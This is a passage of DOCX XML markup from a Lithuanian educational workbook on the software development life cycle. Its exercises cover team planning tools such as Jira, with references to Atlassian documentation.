          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> šiame etape projektuotojas kartu su užsakovu (klientu) bando sukurti aprašą, ką programinė įranga turėtų daryti, koks bus jos funkcionalumas. Reikalavimai formuluojami iš kliento perspektyvos. Dažnai iš pradžių jie formuluojami natūralia kalba užsakovui suprantamomis sąvokomis. Šio etapo vienas iš uždavinių – perkelti reikalavimus iš natūralios kalbos į labiau formalizuotą kalbą.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Dizaino ir architektūros projektavimas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> šiame etape programinės įrangos architektai ir kūrėjai pradeda kurti programinę įrangą. Projektavimo procese naudojami nustatyti architektūros ir programinės įrangos kūrimo modeliai. Architektai kuria programinės įrangos architektūrą. Programuotojai kuria dizaino modelius, kad nuosekliai išspręstų algoritmines problemas. Šis etapas taip pat gali apimti greitą prototipų kūrimą Šio etapo rezultatai: dokumentai, kuriuose išvardyti projektui pasirinkti modeliai, komponentai, prototipai. Taip pat šiame etape gali būti aprašomi nefunkciniai reikalavimai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Programinės įrangos kūrimas (kodo rašymas) ir testavimas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> šiame etape rašomas programos kodas, kuris po to testuojamas pagal ankstesnės veiklos metu apibrėžtus kriterijus. Šis etapas gali būti vykdomas pasirenkant reikiamą metodologiją: Waterfall, Agile ir pan.. Nepriklausomai nuo metodikos, kūrimo komandos turėtų kuo greičiau gaminti programinę įrangą. Testuojant parašytą kodą turi būti užtikrinta: kodo kokybė, funkciniai reikalavimai, saugumas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Integravimas ir testavimas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> realizavus pakankamai programinės įrangos komponentų, jie apjungiami, kaip aprašyta sistemos architektūros apraše ir atliekamas jų testavimas. Šiame etape jau galima atlikti ir tam tikrus priimtinumo testus su klientu (užsakovu). Atlikus testavimą su integruota sistema, ją galima perduoti užsakovui.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Diegimas ir palaikymas:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> šiame etape vykdomas programinės įrangos perdavimas ir diegimas. Veikla po programinės įrangos perdavimo vadinama palaikymu. Tai ilgiausiai trunkanti veikla. Jos metu taisomos klaidos, pastebėtos po programinės įrangos perdavimo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai apie programinės įrangos gyvavimo ciklą galite paskaityti čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Wikipedia (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Introduction to Software Engineering/Process/Life Cycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId189" w:history="1">
        <w:r w:rsidRPr="00F615ED">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://en.wikibooks.org/wiki/Introduction_to_Software_Engineering/Process/Life_Cycle.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F615ED">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lastRenderedPageBreak/>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. UŽRAŠYKITE TRIS KOMANDINIO DARBŲ PLANAVIMO SISTEMAS</w:t>
      </w:r>
      <w:r w:rsidR="002E141E">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Komandinio darbų planavimo sistemos: Jira (Atlassian), Microsoft Project (Microsoft), Trello (Atlassian), HeySpace (Time Solutions TimeCamp Inc.), Taiga (Taiga) ir pan..</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06"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APRAŠYKITE JIRA FUNKCIONALUMĄ IR PANAUDOJIMO GALIMYBES KURIANT IR TESTUOJANT PROGRAMINĘ ĮRANGĄ</w:t>
      </w:r>
      <w:r w:rsidR="001016B8">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Jira siūlo tris programinės įrangos paketus: Jira Core, Jira Software, Jira Service Desk. Pagrindinis Jira funkcionalumas visiems programinės įrangos paketams:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. lankstus projekto planavimas nuo reikalavimų iki konkrečios veiklos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. pilnai konfigūruojamos Kanban ir Scrum lentos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. galimybė įvertinti laiką, kai yra nustatyti prioritetai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4. ataskaitų teikimo funkcijos - nuo diagramų iki proceso greičio matavimų</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>5. pritaikomas darbo eigos procesas, atitinkantys jūsų poreikius</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Jira gali būti naudojama organizuojant programinės įrangos kūrimo procesus. Užtikrina pilną kūrimo ir testavimo procesą. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomą informaciją galite rasti čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Project management for non-project managers</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId190" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.atlassian.com/project-management.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Jira Software best practices</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId191" w:history="1">
        <w:r w:rsidRPr="00F16D9C">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.atlassian.com/software/jira/guides/getting-started/best-practices.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F16D9C">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xml:space="preserve"> APRAŠYKITE PAGRINDINIUS JIRA SISTEMOS APLINKOS ELEMENTUS PAPRASTAM VARTOTOJU</w:t>
      </w:r>
      <w:r w:rsidR="00F16D9C">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Aprašant aplinkos elementus naudokite Jira dokumentaciją:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atlassian Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId192" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/alldoc/atlassian-documentation-32243719.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>6 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> APRAŠYKITE KAIP YRA VYKDOMAS PROJEKTINIS DARBAS JIRA DARBŲ PLANAVIMO SISTEMOJE</w:t>
      </w:r>
      <w:r w:rsidR="00CC655D">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Projektinis darbas Jira darbų planavimo sistemoje yra vykdomas etapais:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. sukuriamas projektas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Create a project</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId193" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/get-started-with-jira-core/create-a-project-917965385.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">
        <w:rPr>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2. sukuriamos projekto užduotys:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Creating issues and sub-tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId194" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jiracoreserver073/creating-issues-and-sub-tasks-861257329.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3. pasirenkamas užduočių vykdymo modelis:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Idalko (2018). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A guide to Jira workflow best practices (with examples)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId195" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.idalko.com/jira-workflow-best-practices.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">
        <w:rPr>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4. vykdomos projekto užduotys pagal pasirinktą modelį:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Working with boards</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId196" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jiracorecloud/working-with-boards-800712866.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">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7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE KAIP YRA PLANUOJAMOS, SUKURIAMOS, APRAŠOMOS UŽDUOTYS JIRA DARBŲ PLANAVIMO SISTEMOJE</w:t>
      </w:r>
      <w:r w:rsidR="00C20971">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašymui galite naudoti Jira dokumentaciją:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Working with issues</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId197" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://confluence.atlassian.com/jirasoftwarecloud/working-with-issues-764478424.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00005793">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Atlassian (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Working with issues in Jira Software</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId198" w:history="1">
        <w:r w:rsidRPr="00005793">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.atlassian.com/agile/tutorials/issues.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Atlassian (2019). </w:t>
      </w:r>
